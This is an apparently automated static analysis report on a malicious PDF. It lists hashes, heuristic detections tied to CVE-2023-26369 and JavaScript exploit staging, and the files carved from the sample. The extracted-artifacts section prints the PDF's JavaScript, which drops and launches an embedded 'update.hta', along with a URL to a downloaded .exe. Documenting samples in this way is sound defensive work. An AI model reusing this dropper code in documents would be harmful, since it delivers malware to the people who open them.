Malicious PDF — malware analysis report

Static analysis result for SHA-256 4786ae187fba6156…

MALICIOUS

PDF

153.5 KB Authoring application: PyPDF2 First seen: 2026-05-23
MD5: 975fe2e92ab8f53dd7859ead3b8bc0f3 SHA-1: a41fe94f1b6a86891dd45303975c644e1f1f60af SHA-256: 4786ae187fba6156a6f796426c7b7978258f61c259f22522ca136887e98c87fa
202 Risk Score

Machine Learning

  • Nyx PDF Classifier suspicious score 0.3334

Heuristics 10

  • TrueType bitmap font + active content — CVE-2023-26369 related high CVE related PDF_CVE_2023_26369_RELATED
    PDF embeds a TrueType font with bitmap tables (EBDT/sbix/CBDT) alongside exploit delivery indicators — CVE-2023-26369 exploits the sfac_GetSbitBitmap function in Adobe's libCoolType for arbitrary code execution. This CVE was actively exploited in the wild, but this rule does not validate the malformed EBLC/EBDT primitive.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • External URI low PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://github.com/vanhauser-thc/thc-hydra PDF link annotation
    • http://localhost:3000/files/bypass.pdf-1778690614.exeIn extracted file (update.hta)
    • https://wwww.microsoft.com0In extracted file (font_00_sfnt_off00000917.bin)
    • http://en.wikipedia.org/wiki/MIT_LicenseIn extracted file (font_00_sfnt_off00000917.bin)
    • http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_2010-07-06.crl0ZIn extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pki/certs/MicCodSigPCA_2010-07-06.crt0In extracted file (font_00_sfnt_off00000917.bin)
    • http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0ZIn extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0��In extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/PKI/docs/CPS/default.htm0@In extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0lIn extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pkiops/certs/Microsoft%20Time-Stamp%20PCA%202010(1).crt0In extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pkiops/Docs/Repository.htm0In extracted file (font_00_sfnt_off00000917.bin)
    • http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0In extracted file (font_00_sfnt_off00000917.bin)
    • http://www.monotype.com/html/mtname/ms_symbol.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlMicrosoftIn extracted file (font_03_sfnt_off0001c41c.bin)
    • http://www.monotype.com/html/type/license.htmlIn extracted file (font_03_sfnt_off0001c41c.bin)
    • https://docs.microsoft.com/typography/abouthttp://lucasfonts.comMicrosoftIn extracted file (font_04_sfnt_off0001f946.bin)
    • http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0ZIn extracted file (font_04_sfnt_off0001f946.bin)
    • http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0In extracted file (font_04_sfnt_off0001f946.bin)

Extracted artifacts 10

Files carved from inside the sample during analysis.

FilenameKindSourceSize
update.hta pdf-embedded-file PDF EmbeddedFile object 61 at offset 0x258C2 810 bytes
SHA-256: 902d25f2579ff40db8132b5d89f416a3da049b64e0622393b1bce5705c014c6e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
javascript_obj0003_000.js pdf-javascript-stream PDF /JS object 3 at offset 0x79 298 bytes
SHA-256: 0f48b7c4abda397770c1057be30f7068e3b865da0acd88454265e016dc4c863f
Preview script
First 1,000 lines of the extracted script
�� 
 / /   * 5 / J 1   H * 4 : J D   H T A   * D B ' & J ' K 
 t r y   { 
         t h i s . e x p o r t D a t a O b j e c t ( {   c N a m e :   " u p d a t e . h t a " ,   n L a u n c h :   t r u e   } ) ; 
 }   c a t c h ( e )   { 
         a p p . a l e r t ( " E r r o r :   "   +   e ) ; 
 }
javascript_obj0065_001.js pdf-javascript-stream PDF /JS object 65 at offset 0x25B9C 356 bytes
SHA-256: 2eedeb59aa5f44d086c0b87d071deb755bb416130deb83f0728977979d8da676
Preview script
First 1,000 lines of the extracted script
�� 
 / /   * 5 / J 1   H * 4 : J D   H T A 
 t r y   { 
         t h i s . e x p o r t D a t a O b j e c t ( {   c N a m e :   " u p d a t e . h t a " ,   n L a u n c h :   t r u e   } ) ; 
         a p p . a l e r t ( " L a u n c h i n g   u p d a t e . . . " ) ; 
 }   c a t c h ( e )   { 
         a p p . a l e r t ( " E r r o r :   "   +   e ) ; 
 }
stream_017_off00000079.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x79 167 bytes
SHA-256: 0b1535953e6197bac91d9f285f0f5c9d5ba816b31678c182e99974c7af502413
stream_018_off00025b9c.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x25B9C 188 bytes
SHA-256: d5fcf54f10baefcebf2f135450be6bba59233b3064c4234f90de379588881bb7
font_00_sfnt_off00000917.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x917 83708 bytes
SHA-256: 197901c226eb147cd307d52ebe06271eb731fbb058afd9989de7e88bb33b5b3f
font_01_sfnt_off000091f6.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x91F6 78816 bytes
SHA-256: 617ce02ccf024a1926b891a14ec9f43c978229b08c2b5a0541d9ad2c81b04563
font_02_sfnt_off00011a72.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x11A72 101944 bytes
SHA-256: f4c24523f0fd4691eb6e6d594b9c9fd03104779aec5df997e1280daa815b59c3
font_03_sfnt_off0001c41c.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1C41C 11088 bytes
SHA-256: 086b4c456dbe6f09f8c99517bcda6cd0f82646bc0cf77bf0a1e64dd9a7c38fd3
font_04_sfnt_off0001f946.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1F946 83164 bytes
SHA-256: a961f68e2eb115095a55afaef0584b6798c4550624e360f978f5e74864d1186d